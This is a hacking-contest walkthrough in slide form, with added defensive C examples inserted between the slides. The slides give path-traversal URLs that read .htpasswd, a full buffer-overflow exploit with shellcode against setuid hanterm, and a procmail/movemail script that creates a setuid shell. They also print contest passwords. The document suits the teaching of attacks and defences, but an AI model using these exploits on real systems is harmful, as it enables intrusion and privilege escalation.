Page 1: 1st OlymFair Workshop, Hacking technique

Taeho Oh

ohhara@4dl.com

ohhara@postech.edu

http://postech.edu/~ohhara

Page 2: Contents

• How to pass level 1

• How to pass level 2

• Why did many hackers spend so much time on level 2?

• About level 3

• Conclusion

Page 3: How to pass level 1 (1)

• What to do?
  – Execute /cgi-bin/data/idaccess.cgi and get the way to go to level 2

Page 4: How to pass level 1 (2)

• Level 1 servers
  – 203.227.243.161
  – 203.227.243.162
  – 203.227.243.163

Page 5: How to pass level 1 (3)

• 203.227.243.161
  – OS: Solaris 8
  – Open TCP ports: 80, 8080

Page 6: How to pass level 1 (4)

• 203.227.243.162
  – OS: HP-UX 11.0
  – Open TCP ports: 22, 80, 8080

Page 7: How to pass level 1 (5)

• 203.227.243.163
  – OS: MS Windows 2000
  – Open TCP ports: 7, 9, 13, 17, 19, 25, 80, 135, 139, 443, 1025, 1026, 1032, 1723, 3389

Page 8: How to pass level 1 (6)

• Attack 203.227.243.161
  – 80: Apache Web Server
  – 8080: Netscape Enterprise Server

• The web servers on 80 and 8080 share the same httpd home directory

• Netscape Enterprise Server has a security bug

Page 9: How to pass level 1 (7)

• Netscape Enterprise Server security bug
  – I could list the files in a specific directory with a request like the one below
    • http://203.227.243.161/?wp-cs-dump
  – You can also use ?wp-ver-info, ?wp-html-rend, ?wp-usr-prop, ?wp-ver-diff, ?wp-verify-link, ?wp-start-ver, ?wp-stop-ver, and ?wp-uncheckout
  – I could browse the directories and check whether files exist

Page 10: How to pass level 1 (8)

• The file list

  /
  +----- cgi-bin/
  |      +----- data/
  |      +----- hackme/
  |             +----- a
  |             +----- a.c
  |             +----- show_file.html
  |             +----- showfile.cgi
  +----- data/
  +----- index.html

  Can't access this directory

Page 11: How to pass level 1 (9)

• Read the .htaccess file with showfile.cgi
  – http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi-bin/data/.htaccess

• Read the .htpasswd file named in .htaccess, again with showfile.cgi
  – http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi-bin/data/.htpasswd

Page 12: How to pass level 1 (10)

• I could crack the encrypted password from .htpasswd with Crack
  – id:password = admin:banana
  – I could access the /cgi-bin/data directory with this id and password

Page 13: How to pass level 1 (11)

• I could get the way to go to level 2
  – http://203.227.243.161/data/idaccess.html

• This page is the form that executes http://203.227.243.161/cgi-bin/data/idaccess.cgi
  – My serial number
    • KOR000321-961829513
  – My password
    • oD8YEuqYySWogKSQQsOY00zoAjUkxtv7

Page 14: How to pass level 1 (12)

• Netscape Enterprise Server directory indexing vulnerability
  – See http://www.securityfocus.com/vdb/bottom.html?vid=1063

Page 15: How to pass level 1 (13)

• Netscape Enterprise Server directory indexing vulnerability patch information

  The Directory Indexing feature can be turned off via the Administration Interface. Selecting Content Management -> Document Preferences and changing Directory Indexing to "none" will disable this feature.

  Also, manually editing the file obj.conf will do the same. Conduct a search for the following:

    Service method="(GET|HEAD)" type="magnus-internal/directory" fn="index-common"

  and replace fn="index-common" with fn="send-error".
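The level 1 chain rests on two missing controls: the directory listing on slide 9 was reachable through the ?wp- query strings, and showfile.cgi on slide 11 opened whatever path its NAME parameter named, dotfiles under another directory included. As an added example that is not code from the slides or from the contest servers, the C below shows both the prevention and the detection side: cgi_name_is_safe() is the path check a file-viewing CGI would need before opening NAME, and request_is_suspicious() is detection logic run over constructed sample request lines. The function names, the assumed "METHOD /path?query HTTP/1.x" request-line format and the sample lines are all assumptions, not material from the slides.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not code from the slides or the contest server.
 * cgi_name_is_safe() is the kind of check a file-viewing CGI such as
 * showfile.cgi (slide 11) would need before opening NAME=...: only a
 * relative path, no empty or "."/".." components, no dotfiles such as
 * .htaccess or .htpasswd. It must run on the URL-decoded value.
 * Returns 1 if the name may be opened, 0 otherwise. */
int cgi_name_is_safe(const char *name)
{
    const char *p = name;

    if (name == NULL || *name == '\0' || *name == '/')
        return 0;                        /* empty or absolute path */
    while (*p != '\0') {
        const char *slash = strchr(p, '/');
        size_t len = slash ? (size_t)(slash - p) : strlen(p);

        if (len == 0)
            return 0;                    /* empty component, e.g. "a//b" */
        if (p[0] == '.')
            return 0;                    /* ".", "..", ".htaccess", ".htpasswd" */
        p += len;
        if (*p == '/')
            p++;
    }
    return 1;
}

/* Query strings of the Netscape Enterprise Server directory indexing bug
 * listed on slide 9. Any of them in a request is worth an alert. */
static const char *wp_tags[] = {
    "?wp-cs-dump", "?wp-ver-info", "?wp-html-rend", "?wp-usr-prop",
    "?wp-ver-diff", "?wp-verify-link", "?wp-start-ver", "?wp-stop-ver",
    "?wp-uncheckout", NULL
};

/* Detection side: returns 1 for a web-log request line ("METHOD /path?query
 * HTTP/1.x", the usual access-log field, assumed here) that probes a ?wp-*
 * tag or points showfile.cgi at a NAME the check above would refuse. */
int request_is_suspicious(const char *request_line)
{
    const char *marker = "showfile.cgi?NAME=";
    const char *value;
    char name[256];
    size_t n;

    for (int i = 0; wp_tags[i] != NULL; i++)
        if (strstr(request_line, wp_tags[i]) != NULL)
            return 1;

    value = strstr(request_line, marker);
    if (value == NULL)
        return 0;
    value += strlen(marker);
    n = strcspn(value, " &");            /* value ends at a space or the next parameter */
    if (n >= sizeof name)
        n = sizeof name - 1;
    memcpy(name, value, n);
    name[n] = '\0';
    return cgi_name_is_safe(name) ? 0 : 1;
}

/* Constructed sample request lines modelled on slides 9 and 11 (not a real
 * log from the contest). The two that reproduce the level 1 steps should
 * be flagged; the two ordinary requests should not. */
static const char *sample_requests[] = {
    "GET /index.html HTTP/1.0",
    "GET /?wp-cs-dump HTTP/1.0",
    "GET /cgi-bin/hackme/showfile.cgi?NAME=show_file.html HTTP/1.0",
    "GET /cgi-bin/hackme/showfile.cgi?NAME=/cgi-bin/data/.htpasswd HTTP/1.0",
};

/* Runs the detector over the constructed sample; 2 of the 4 lines are flagged. */
int count_suspicious_samples(void)
{
    int hits = 0;
    for (size_t i = 0; i < sizeof sample_requests / sizeof sample_requests[0]; i++)
        hits += request_is_suspicious(sample_requests[i]);
    return hits;
}

int main(void)
{
    for (size_t i = 0; i < sizeof sample_requests / sizeof sample_requests[0]; i++)
        printf("%s  %s\n", request_is_suspicious(sample_requests[i]) ? "ALERT" : "ok   ",
               sample_requests[i]);
    printf("%d of %zu sample requests flagged\n", count_suspicious_samples(),
           sizeof sample_requests / sizeof sample_requests[0]);
    return 0;
}
```

The path check deliberately rejects every component that begins with a dot rather than keeping a list of forbidden file names, because the file that matters next time (a .htpasswd, a .bak, a .git directory) will not be on the list. The detector is a substring match, so it is cheap to run over a whole access log, but it must see the same URL-decoded value the CGI sees; an encoded "%2e%2e" would otherwise slip past both functions.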

Page 16: How to pass level 2 (1)

• What to do?
  – Execute /home/forbidden/pass.cgi

• The owner of this executable file is root

• The group of this executable file is wizard

• The permission is 0510

• So a wizard gid is needed to execute /home/forbidden/pass.cgi

Page 17: How to pass level 2 (2)

• Level 2 server
  – 203.227.243.164

• 203.227.243.164
  – OS: Linux
  – Open TCP ports: 23, 81

Page 18: How to pass level 2 (3)

• Wizard setuid or setgid files

  -r-sr-xr-x 1 wizard wizard 26309 Jan 4 09:40 /sbin/pwdb_chkpwd
  -rwsr-sr-x 1 wizard wizard 47692 Mar 29 1999 /sbin/dump
  -rwsr-xr-x 1 wizard wizard 10708 Apr 20 1999 /sbin/cardctl
  -rws--x--x 1 wizard wizard 6148 May 15 1999 /usr/X11R6/bin/Xwrapper
  -rws--x--x 1 wizard wizard 158180 May 14 1999 /usr/X11R6/bin/hanterm
  -rwsr-xr-x 1 wizard wizard 33120 Mar 22 1999 /usr/bin/at
  -rwsr-xr-x 1 wizard wizard 3208 Mar 23 1999 /usr/bin/disable-paste
  -r-sr-x--- 1 wizard wizard 42652 Aug 31 1999 /usr/bin/inndstart
  -r-sr-x--- 1 wizard wizard 40060 Aug 31 1999 /usr/bin/startinnfeed
  -r-sr-sr-x 1 wizard wizard 15816 Jan 7 07:41 /usr/bin/lpq
  -r-sr-sr-x 1 wizard wizard 15608 Jan 7 07:41 /usr/bin/lpr
  -r-sr-sr-x 1 wizard wizard 16248 Jan 7 07:41 /usr/bin/lprm

Page 19: How to pass level 2 (4)

• Wizard setuid or setgid files (Cont.)

  -rws--x--x 2 wizard wizard 517916 Apr 7 1999 /usr/bin/suidperl
  -rws--x--x 2 wizard wizard 517916 Apr 7 1999 /usr/bin/sperl5.00503
  -rwsr-sr-x 1 wizard wizard 64468 Apr 7 1999 /usr/bin/procmail
  -rwsr-xr-x 1 wizard wizard 14036 Apr 16 1999 /usr/bin/rcp
  -rwsr-xr-x 1 wizard wizard 10516 Apr 16 1999 /usr/bin/rlogin
  -rwsr-xr-x 1 wizard wizard 7780 Apr 16 1999 /usr/bin/rsh
  -rwxr-sr-x 1 wizard wizard 17832 May 14 1999 /usr/lib/emacs/20.3/i386-redhat-linux/movemail
  -rwsr-sr-x 1 wizard wizard 299364 Apr 20 1999 /usr/sbin/sendmail
  -rwsr-xr-x 1 wizard wizard 16488 Mar 23 1999 /usr/sbin/traceroute
  -rwsr-xr-x 1 wizard wizard 18040 Jan 8 05:24 /usr/sbin/userhelper
  -rwxr-sr-x 1 wizard wizard 3860 Apr 20 1999 /sbin/netreport

Page 20: How to pass level 2 (5)

• Attack process

  Get level2 shell
    → Get wizard euid
    → Get wizard uid
    → Create wizard uid, gid file
    → Get wizard gid
    → Execute pass.cgi

Page 21: How to pass level 2 (6)

• level2 shell → wizard euid
  – Exploit the hanterm bug

  [I have no name!@level2 ... ]$ hanterm -hfn `perl -e "print 'A'x240"`
  can't load english font AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  [I have no name!@level2 ... ]$ hanterm -hfn `perl -e "print 'A'x250"`
  Segmentation fault
  [I have no name!@level2 ... ]$

Page 22: How to pass level 2 (7)

• level2 shell → wizard euid (Cont.)
  – This is a classical buffer overflow bug
  – I could get a wizard euid shell with a 260-byte buffer size and an offset of -450

Pages 23-28: How to pass level 2 (8)-(13)

• Exploit code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen */
#include <unistd.h>   /* execl */

#define OFFSET -450         /* default distance from our %esp to the guessed return address */
#define RET_POSITION 260    /* argument length at which the return address is overwritten */
#define RANGE 20
#define NOP 0x90

char shellcode[1024]=
"\xeb\x1f" /* jmp 0x1f */
"\x5e" /* popl %esi */
"\x89\x76\x08" /* movl %esi,0x8(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %eax,0x7(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xd8" /* movl %ebx,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xdc\xff\xff\xff" /* call -0x24 */
"/bin/sh"; /* .string "/bin/sh" */

/* current stack pointer; i386 gcc convention, the value left in %eax is the return value */
unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");
}

int main(int argc,char **argv)
{
    char buff[RET_POSITION+RANGE+1],*ptr;
    long *addr_ptr,addr;
    unsigned long sp;
    int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
    int i;

    if(argc>1)
        offset=atoi(argv[1]);        /* optional: a different offset from the command line */
    sp=get_sp();
    addr=sp-offset;
    ptr=buff;
    /* fill the buffer with the guessed address, 4 bytes at a time, without running past its end */
    addr_ptr=(long*)ptr;
    for(i=0;i+4<=bsize;i+=4)
        *(addr_ptr++)=addr;
    /* then a NOP sled followed by the shellcode, leaving RANGE*2 bytes of addresses at the end */
    for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
        buff[i]=NOP;
    ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
    for(i=0;i<strlen(shellcode);i++)
        *(ptr++)=shellcode[i];
    buff[bsize-1]='\0';
    execl("/usr/X11R6/bin/hanterm","hanterm","-hfn",buff,(char *)0);
    return 0;
}
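Slides 21 and 22 show the crash boundary (240 bytes accepted, 250 bytes a segmentation fault) and slides 23 to 28 the exploit that turns it into a wizard euid shell. As an added example that is not hanterm's source (which the slides do not show), the C below puts the unsafe copy pattern that produces such a crash next to a hardened replacement that measures before copying and refuses an over-long -hfn value instead of truncating it. FONT_NAME_MAX, the function names and the driver try_font_arg() are assumptions chosen only so the example reproduces the slide's two numbers.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not hanterm's source. The behaviour on slide 21, 240 bytes
 * accepted and 250 bytes a segmentation fault, is the signature of an
 * option value copied into a fixed stack buffer with no length check.
 * FONT_NAME_MAX is an assumed size chosen so that 240 fits and 250 does not. */
#define FONT_NAME_MAX 244

#if 0
/* The pattern that produces such a crash, kept out of the build: once the
 * argument is longer than `font`, strcpy() writes past it into the saved
 * frame pointer and return address, which is what the exploit on slides
 * 23-28 relies on. */
static void load_font_unsafe(const char *arg)
{
    char font[FONT_NAME_MAX];
    strcpy(font, arg);
}
#endif

/* Hardened form: measure before copying and refuse anything that does not
 * fit, rather than truncating silently. Returns 0 and fills `dst` on
 * success; returns -1 and leaves `dst` empty when `src` is too long, and a
 * setuid program should then report the error and exit. */
int copy_font_name(char *dst, size_t dstsize, const char *src)
{
    size_t n = 0;

    if (dstsize == 0)
        return -1;
    while (n < dstsize && src[n] != '\0')     /* never scan past what would fit */
        n++;
    if (n == dstsize) {                       /* no terminator within dstsize bytes */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);                  /* n + 1 includes the terminator */
    return 0;
}

/* Feeds copy_font_name() an argument shaped like the ones on slide 21,
 * a run of `len` 'A' characters, and returns its result: 0 if the value
 * was accepted, -1 if it was refused as too long. */
int try_font_arg(size_t len)
{
    char arg[512];
    char font[FONT_NAME_MAX];

    if (len >= sizeof arg)
        return -1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    return copy_font_name(font, sizeof font, arg);
}

int main(void)
{
    size_t lens[] = { 240, 250, 260 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("-hfn with %zu bytes: %s\n", lens[i],
               try_font_arg(lens[i]) == 0 ? "accepted" : "rejected, too long");
    return 0;
}
```

Refusing rather than truncating is the deliberate choice here: a font name that has been cut short is still attacker-chosen input flowing on into the rest of a setuid program, and the exploit's tuning of buffer size and offset on slide 22 shows how little the attacker needs once any write past the buffer is possible. On a modern toolchain the same function would additionally be protected by stack canaries and a non-executable stack, but those are mitigations for a bug that this check removes outright.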

Page 29: How to pass level 2 (14)

• wizard euid → wizard uid

  [I have no name!@level2 ... ]$ cat > a.c
  main(){
  setreuid(501,501);
  execl("/bin/sh","sh",0);
  }
  [I have no name!@level2 ... ]$ gcc a.c ; ./a.out
  [wizard@level2 ... ]$ whoami
  wizard
  [wizard@level2 ... ]$

Page 30: How to pass level 2 (15)

• wizard uid → create wizard uid, gid file
  – movemail is a wizard setgid program

• The output file of movemail has gid wizard

  [wizard@level2 ... ]$ echo haha > test1
  [wizard@level2 ... ]$ movemail test1 test2
  [wizard@level2 ... ]$ ls -l test1 test2
  -rw-r--r-- 1 wizard hackers 0 Jul 10 02:03 test1
  -rw-r--r-- 1 wizard wizard 5 Jul 10 02:03 test2
  [wizard@level2 ... ]$ cat test2
  haha

Page 31: How to pass level 2 (16)

• wizard uid, gid file → wizard gid
  – procmail can execute an arbitrary shell command with wizard uid and gid when the user can create a file with wizard uid and gid

Pages 32-34: How to pass level 2 (17)-(19)

• Exploit code

#!/bin/sh
# movemail (the wizard setgid program from slide 30) lives in the emacs directory
PATH=${PATH}:/usr/lib/emacs/20.3/i386-redhat-linux
export PATH
cat > shh.c << EOF
main(){
setreuid(501,501);
setregid(501,501);
execl("/bin/sh","sh",0);
}
EOF
gcc shh.c -o shh
# copying through movemail creates shh2 with gid wizard
movemail shh shh2
# procmail rule: for every delivered message, chmod /tmp/shh2
# (the rule names /tmp/shh2 and the script uses ./shh2, so it is run from /tmp)
cat > proc << EOF
:0
*
| /bin/chmod 6777 /tmp/shh2
EOF
movemail proc /home/wizard/.procmailrc
# deliver a message to wizard so procmail runs the rule with wizard's uid and gid
echo haha | /usr/sbin/sendmail -OQueueDirectory=/tmp wizard
sleep 2
rm -f /home/wizard/.procmailrc
rm -f ./proc
rm -f ./exp
rm -f ./shh.c
rm -f ./shh
echo "rm -f ./shh2" | ./shh2

Page 35: How to pass level 2 (20)

• wizard gid → execute pass.cgi

  Congratulation!!
  You have passed Level 2.
  Your ID : KOR000321-961829513
  Initial Pass Time Stamp : 2000-06-30 13:59:30GMT+9
  IP for Level 3 is 203.227.243.173
  It is protected by ip filtering.
  Please attack and acquire adminstrator's privilege.And then change the index.html under level3 server.
  Level 3 Login ID : level3
  Level 4 Login Passwd : olymfair3

Page 36: Why did many hackers spend so much time on level 2? (1)

• Almost all hackers tried to find a security bug
  – However, level 2 can be cleared not with a bug but with a feature (except for the hanterm bug)

Page 37: Why did many hackers spend so much time on level 2? (2)

• /sbin/dump has a buffer overflow bug, and no exploit has been released
  – Many hackers tried to exploit this program. However, the exploit is impossible because the main function does not return but calls exit, so an overwritten return address is never used

Page 38: Why did many hackers spend so much time on level 2? (3)

• The /usr/bin/lprm exploit code generates a segmentation fault message
  – The segmentation fault message is not generated by /usr/bin/lprm. It is generated by the /usr/bin/lprm exploit code itself; it is a bug in the exploit code.

Page 39: About level 3

• I had consumed much time, so I had no time to attack level 3

• I tried to scan the level 3 server
  – However, I couldn't find any open TCP port
  – I didn't try to attack level 3 after that

• It seemed it would take much time

Page 40: Conclusion

• It was an interesting hacking competition